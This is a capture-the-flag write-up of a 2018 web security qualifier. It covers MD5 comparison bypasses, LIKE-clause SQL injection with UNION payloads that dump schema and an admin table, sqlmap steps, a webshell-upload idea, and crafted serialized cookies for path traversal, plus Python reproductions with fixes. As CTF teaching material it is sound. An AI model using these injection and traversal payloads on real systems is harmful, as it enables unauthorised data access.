2018 Web Security Test Autumn Qualifier writeup

Posted by trammel at 2020-04-07

Yesterday I was badly outclassed in the autumn preliminary round of Anheng's web security test, and I find myself getting dumber and dumber;

the last three web problems went unsolved (heartbroken).

Simple MD5

Title Link:

Title Description: easy MD5 cracking fail

easy MD5 cracking fail

View source code:

easy MD5 cracking <!--$_POST['data1']!=$_POST['data2']-->fail

The comment shows a loose (!=) comparison of the two POST fields, with the MD5 comparison behind it. Use the array bypass: send data1[]=1&data2[]=2. The two arrays are not equal, and on PHP 7 and earlier md5() of an array returns NULL (with a warning) for both, so the hash check passes as well. Note that PHP 8 makes md5() throw a TypeError on an array argument, so this trick depends on the back-end version.

flag: flag{401cf19d304e557349fecda18110c138}


Title Link:

Title Description: MD5 crackingfail

MD5 crackingfail

Fundamentally, MD5 is a digest algorithm: it maps an input of any length to a fixed 128-bit (16-byte) value, usually written as 32 hex characters. There are only 2^128 possible digests but unboundedly many inputs (already more inputs than outputs once messages are longer than 16 bytes), so by the pigeonhole principle distinct inputs with the same digest must exist. This is called an MD5 collision.

In other words, we need two strings whose contents differ but whose MD5 values are exactly the same.

MD5 is cryptographically broken: such pairs can be produced in seconds with an MD5 collision generator (Marc Stevens' fastcoll, for example), or a published pair can simply be reused.

As with the previous problem, first check the source code:

MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->fail

This time both inputs are cast to string and compared strictly (!==), so the array trick from the previous problem no longer works: an array casts to the string "Array", and two such inputs would compare equal. The digests are also compared with ===, so what is needed is a genuine MD5 collision: two different byte strings with the same digest.

Following an article from abroad, the problem can be solved with curl. The two values below are a published MD5 collision pair, percent-encoded so that every raw byte (including the NUL byte, %00) survives the form encoding; curl --data sends the string as-is and PHP decodes it into $_POST:

curl -v -H "Cookie: PHPSESSID=0dvvm795lrkrck7r0t1gbn762n" --data "data1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&data2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"

flag: flag{9bd1ee7355b58e53214adb9a37b4cb82}

It is worth keeping a known collision pair to hand. The same pair in two encodings:

First, percent-encoded, ready to paste into a form body:

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

Second, the same two 64-byte messages in hex (they differ in only two bytes, at offsets 35 and 55):

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

MD5 of both messages: 008ee33a9d58b51cfeb425b0959121c9
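As an added example (not code from the write-up), the following Python script verifies the collision pair listed above offline and packages the two messages as a form body the way the curl command does, percent-encoding every byte so the NUL and high bytes reach $_POST intact. It also includes the data1[]/data2[] body for the loose-comparison version of the challenge. The hex strings are the ones above; the form field names follow the page, and the claim that the array body only works on PHP before 8 is an assumption about the target's version.

```python
import hashlib
from urllib.parse import quote, unquote, unquote_to_bytes

# The two 64-byte messages listed above (hex form). They are a published
# single-block MD5 collision pair and differ in exactly two bytes.
HEX_A = ("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
         "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2")
HEX_B = ("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
         "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2")

# Body for the first (loose, !=) version of the check: two distinct arrays.
# Field names follow the page. Assumption: this only works on PHP < 8, where
# md5(array) returns NULL instead of throwing a TypeError.
ARRAY_BYPASS_BODY = "data1%5B%5D=1&data2%5B%5D=2"


def verify_collision(hex_a, hex_b):
    """Check that two hex-encoded messages differ yet share an MD5 digest."""
    a, b = bytes.fromhex(hex_a), bytes.fromhex(hex_b)
    digest_a = hashlib.md5(a).hexdigest()
    digest_b = hashlib.md5(b).hexdigest()
    return {
        "distinct": a != b,
        "same_md5": digest_a == digest_b,
        "md5": digest_a,
        "length": len(a),
        "differing_offsets": [i for i, (x, y) in enumerate(zip(a, b)) if x != y],
    }


def form_body(data1, data2):
    """application/x-www-form-urlencoded body with every byte percent-encoded,
    so NUL (%00) and bytes >= 0x80 reach PHP's $_POST unchanged."""
    return "data1=" + quote(data1, safe="") + "&data2=" + quote(data2, safe="")


def decode_form_body(body):
    """Decode a form body back to raw bytes, the way the server side sees it."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote(key)] = unquote_to_bytes(value)
    return fields


if __name__ == "__main__":
    print(verify_collision(HEX_A, HEX_B))
    print(form_body(bytes.fromhex(HEX_A), bytes.fromhex(HEX_B)))
```

The string returned by form_body can be handed to curl --data exactly as in the write-up: curl sends it untouched and PHP percent-decodes it, which is why the raw bytes must never be pasted into the command line directly.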


Try sending a flag

Title Link:

Title Description:

As the description says, POST the flag with HackBar:

HackBar POST: flag{858a14671c27804b63e6e96b0acdfdd7}

Input try

Title Link:

Title Description:

First, check the source code:

<script>
function check(){
    var flag = document.getElementById("flag").value;
    var str = "d84d9657e5e5e" || 0;          // || returns its first truthy operand: the string
    var str = str + ("ad2ad3fe" && 2);       // && returns its last operand when the first is truthy: 2
    var str = str + "a2da9494b8" + "ddea4fd4";
    var str = str.split("").reverse().join("");
    if (str == flag){
        alert("恭喜你已经找到flag!");           // "Congratulations, you have found the flag!"
    }
}
</script>

There is an input with id="flag", and check() builds the expected value entirely from literals: "d84d9657e5e5e" || 0 yields the string, ("ad2ad3fe" && 2) yields the number 2, the pieces are concatenated into one 32-character string and that string is reversed.

Evaluate the same expression directly in the console:

Finally, the answer (the snippet as printed evaluates to this): 4df4aedd8b4949ad2a2e5e5e7569d48d


News search

Title Link:

Title Description:

Click into one of the items:

Testing further, there are a keyword field and a number field; the initial guess is injection, so enter 1' in the keyword field.

Viewing the source shows that the filtering is front-end only:

function myFunction() {
    var x=document.getElementById("number").value;
    var a=document.getElementById("word").value;
    // strip every ASCII and full-width punctuation character from the keyword
    var b=a.replace(/[\ |\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\||\\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\·|\!|\(|\)|\¥|\——|\……|\【|\】|\、|\;|\:|\‘|\“|\”|\’|\,|\。|\、|\《|\》|\?|\ ]/g,"");
    if(a.length!=b.length) {
        alert("请输入正确字符。");    // "Please enter valid characters."
        document.getElementById("number").value = '';
        document.getElementById("word").value = '';
    }
    else if(isNaN(x)) {
        alert("请输入数字。");        // "Please enter a number."
        document.getElementById("number").value = '';
    }
}

The check rejects the keyword if stripping punctuation changes its length, but it runs in the browser only. So disable the JS check (or send the request directly with Burp/HackBar, which bypasses a client-side filter anyway), and guess that the back end runs an injectable SQL query for the keyword search.

After a series of attempts there was no echo. Time to change approach: after all the qualifier is short and there are many questions (QAQ), and getting the flag is king, so use manual injection.

Keyword searches like this usually use a fuzzy LIKE '%...%' query, so the payload has to close the opening %' and then consume the trailing %' that the template appends. Payload:

1%' AND 1=1 AND '%'='

which the back end turns into something like WHERE col LIKE '%1%' AND 1=1 AND '%'='%'. From the result echoed in the figure above, the injection works (comparing against an AND 1=2 variant, which should return nothing, confirms it).

Let's look at how LIKE '%...%' behaves. First:

mysql> select * from tests where password like '%a%';
+---------+----------+
| usename | password |
+---------+----------+
| admin   | password |
| admin   | admin    |
+---------+----------+
2 rows in set (0.00 sec)

mysql> select * from tests where password like '%as%';
+---------+----------+
| usename | password |
+---------+----------+
| admin   | password |
+---------+----------+
1 row in set (0.00 sec)

LIKE '%$value%' matches like the regular expression /.*$value.*/: anything before and after $value. To inject, the payload must first close the opening '% ... with its own quote, and then leave something that absorbs the trailing %' the template appends (for example ending with AND '%'=, which becomes AND '%'='%').

With LIKE injection understood, back to the challenge.


Find the column count

payload: 1%' order by 3-- : returns normally

payload: 1%' order by 4-- : errors

So the queried table has three columns. (In MySQL a -- comment must be followed by whitespace, so send a trailing space, or --+ when the payload goes in a URL; otherwise the --%' left behind is not treated as a comment.)

Find the echo positions

payload: 1%' union select 1,2,3-- : 1,2,3 appear at the bottom of the page, so all three columns are displayed.

Enumerating the tables, columns and fields is the usual routine and is omitted here; the final payload is given directly:

payload: 1%' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),(select group_concat(column_name) from information_schema.columns where table_schema=database()),flag from admin--

This fills the three echo positions with the table names of the current database, its column names, and the flag column of the admin table.

Finally, we get the flag: flag{f98505d1d12f50a0bd9463e90876630}
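Added example, not code from the challenge: a runnable model of the injection above. The back end is guessed to paste the keyword into a LIKE '%...%' pattern, so the same query shape is rebuilt here on an in-memory SQLite database with constructed sample rows, and the write-up's payloads (boolean probe, ORDER BY column count, UNION echo, schema plus flag dump) are run against it. SQLite has no information_schema, so sqlite_master stands in for it in the final payload; the table and column names are constructed, and a parameterised version is included to show the same payloads do nothing against it.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the challenge database (sample data, not the real one)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'news item 1', 'first body');
        INSERT INTO news VALUES (2, 'second story', 'second body');
        CREATE TABLE admin(id INTEGER, username TEXT, flag TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'flag{constructed_sample_flag}');
    """)
    return con


def vulnerable_search(con, word):
    """Guessed back-end shape: the keyword is pasted into a LIKE '%...%' pattern."""
    sql = "SELECT id, title, body FROM news WHERE title LIKE '%" + word + "%'"
    return con.execute(sql).fetchall()


def safe_search(con, word):
    """Hardened form: the whole pattern is a bound parameter, so quotes in word are data.
    (% and _ inside word still act as wildcards unless escaped with an ESCAPE clause.)"""
    return con.execute(
        "SELECT id, title, body FROM news WHERE title LIKE ?", ("%" + word + "%",)
    ).fetchall()


def boolean_probe(con):
    """Both payloads close the pattern and reopen it so the trailing %' is consumed;
    a true condition returns rows, a false one returns none."""
    true_rows = vulnerable_search(con, "1%' AND 1=1 AND '%'='")
    false_rows = vulnerable_search(con, "1%' AND 1=2 AND '%'='")
    return len(true_rows), len(false_rows)


def column_count(con, limit=10):
    """ORDER BY n succeeds while n <= number of selected columns, then errors."""
    for n in range(1, limit + 1):
        try:
            vulnerable_search(con, "1%' ORDER BY " + str(n) + "--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def echo_positions(con):
    """UNION SELECT 1,2,3 shows which columns are rendered back to the user."""
    return vulnerable_search(con, "1%' UNION SELECT 1,2,3--")


def dump_schema_and_flag(con):
    """SQLite analogue of the information_schema payload in the write-up:
    sqlite_master plays the role of information_schema.tables/columns."""
    payload = ("1%' UNION SELECT "
               "(SELECT group_concat(name) FROM sqlite_master WHERE type='table'),"
               "(SELECT group_concat(sql) FROM sqlite_master),"
               "flag FROM admin--")
    rows = vulnerable_search(con, payload)
    # UNION does not guarantee row order, so pick the row carrying the flag.
    return next(r for r in rows if str(r[2]).startswith("flag{"))


if __name__ == "__main__":
    db = build_db()
    print(boolean_probe(db), column_count(db), echo_positions(db))
    print(dump_schema_and_flag(db))
```

The -- comment is accepted by SQLite with nothing after it; against MySQL the same payloads need a space or + after the dashes, as noted above.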


Solving with sqlmap:

The form is submitted by POST and the injectable parameter is word; sqlmap finds it as soon as it runs. Assuming the form field names match the element ids (word and number), the run is sqlmap -u <url> --data "word=1&number=1" -p word, then:

First: enumerate the databases (--dbs)

Second: enumerate the tables (-D <database> --tables)

Then: enumerate the columns (-D <database> -T <table> --columns)

Finally: dump the column contents (-D <database> -T <table> -C <column> --dump)

which again yields the flag: flag{f98505d1d12f50a0bd9463e90876630}



Title Link:

Title Description: play with the snake

The entry page is a Snake game. Decisively go for the JS logic: with F12, look at the external JS script referenced from the page source, and inside it find a block of emoticon (kaomoji) text.

So I guessed this segment of kaomoji text should contain flag-related information, so I executed it in the console.

Obviously the flag it gives is wrong; click view and continue.

Finally, we get the answer: flag{660332922504a5f06dd871a7fe78ba9c}


New station

Title Link:

Title Description: a newly developed little site; see whether you can find any problems

Click the link and you see a website. After registering an account, you see:

Work around the type check (only jpg is accepted) to upload a picture; then inspect the picture and find a Base64 string in it.

Viewed in Burp, this Base64 string is very long. In the request's cookie, the Picture value decodes to a PHP serialized array, which contains the saved filename of the uploaded file.

Decode it with Burp's Decoder.

Guess: the Picture value names a file that is read by the back end, and the page displays that file's contents as Base64. Try index.php by constructing the serialized value by hand. First, how a serialized array is put together.

Here's an example:

a:2:{i:0;s:5:"1.jpg";i:1;s:5:"1.php";}

a means array; the 2 says the array holds two entries, 1.jpg and 1.php; i is the integer index; s marks a string, and the 5 is its length in bytes. So this is 0=>1.jpg, 1=>1.php.

For a:1:{i:0;s:9:"index.php";} the Base64 is YToxOntpOjA7czo5OiJpbmRleC5waHAiO30=; replay it in Burp and see the echo.

From here there are two ideas: upload a one-line webshell and get a shell, since the save path is disclosed and only the type is checked; or guess directly where the flag is and read it.

Both are simple.

First method: after changing the upload's Content-Type to image/jpg, visit the uploaded file and run find / -name flag* through it.

Second method: by trial, the flag is at ../../flag.php,

so construct a:1:{i:0;s:14:"../../flag.php";} => YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30= and send the request:



GET /index.php/picture HTTP/1.1
Host:
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Picture=YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=; PHPSESSID=1vm2g30rlcqosqsj9ici1rdku1; session=eyJsb2dpbiI6dHJ1ZSwidXNlcm5hbWUiOiJYWEgifQ.DreFfA.iwKT84kXV5efjz90397IoKUYiik

# response (part)
<img src="data:image/jpg;base64,PD9waHAKCiRmbGFnID0gImZsYWd7TjRtZV9zUGFjNF9Jc19JbnQzcjNzdDFuZ30iOwplY2hvICJmbGFne1RoaXNfMVNfQV9GNGtlX2YxYUd9IjsK">

# base64 decoded
<?php

$flag = "flag{N4me_sPac4_Is_Int3r3st1ng}";
echo "flag{This_1S_A_F4ke_f1aG}";

The page itself only prints flag{This_1S_A_F4ke_f1aG}; the real flag is the one in the $flag variable.
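Added example, not part of the original write-up: Python helpers that build the serialized PHP array and the Base64 cookie value by hand, generalising the a:N:{...} construction explained above to any list of strings with byte-accurate lengths, parse such a value back (honouring the declared lengths, so quotes or semicolons inside a path do not confuse it), and decode the data: URI the page returns. The sample paths, the cookie name Picture and the response Base64 are taken from the write-up; the helper names are my own.

```python
import base64

# The src attribute from the response shown above (taken from the write-up).
RESPONSE_IMG_SRC = (
    "data:image/jpg;base64,PD9waHAKCiRmbGFnID0gImZsYWd7TjRtZV9zUGFjNF9Jc19JbnQz"
    "cjNzdDFuZ30iOwplY2hvICJmbGFne1RoaXNfMVNfQV9GNGtlX2YxYUd9IjsK"
)


def php_serialize_list(items):
    """Serialize a list of str as a PHP indexed array of strings:
    a:N:{i:0;s:len:"...";...}. Lengths are UTF-8 byte lengths, as PHP counts them."""
    parts = []
    for idx, value in enumerate(items):
        raw = value.encode("utf-8")
        parts.append('i:%d;s:%d:"%s";' % (idx, len(raw), value))
    return "a:%d:{%s}" % (len(items), "".join(parts))


def picture_cookie(paths):
    """Value for the Picture cookie: Base64 of the serialized array."""
    return base64.b64encode(php_serialize_list(paths).encode("utf-8")).decode("ascii")


def php_unserialize_list(blob):
    """Minimal parser for the same shape. It trusts the declared byte length of
    each string rather than scanning for the closing quote."""
    if not (blob.startswith("a:") and blob.endswith("}")):
        raise ValueError("not a serialized array")
    count_end = blob.index(":", 2)
    count = int(blob[2:count_end])
    data = blob[count_end + 2:-1].encode("utf-8")   # strip ':{' and the final '}'
    pos, out = 0, []
    for _ in range(count):
        if data[pos:pos + 2] != b"i:":
            raise ValueError("expected integer key at %d" % pos)
        pos = data.index(b";", pos) + 1
        if data[pos:pos + 2] != b"s:":
            raise ValueError("expected string value at %d" % pos)
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip ':"'
        out.append(data[start:start + length].decode("utf-8"))
        pos = start + length + 2                      # skip '";'
    return out


def decode_picture_response(data_uri):
    """Strip the data:image/...;base64, prefix the page wraps around the file
    and return the file contents as text."""
    b64 = data_uri.split("base64,", 1)[1]
    return base64.b64decode(b64).decode("utf-8")


if __name__ == "__main__":
    print(picture_cookie(["index.php"]))
    print(picture_cookie(["../../flag.php"]))
    print(decode_picture_response(RESPONSE_IMG_SRC))
```

Because the cookie is unserialized server-side and its contents become a file path, this is both a deserialization of attacker-controlled data and a path traversal; fixing either (signing the cookie, or resolving the path and checking it stays inside the upload directory) would close the read.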

Alas! My ability is limited and I could only get this far; as for the ranking, it looks like I can't make the next round.

Thanks to my friends for their help and guidance (thx).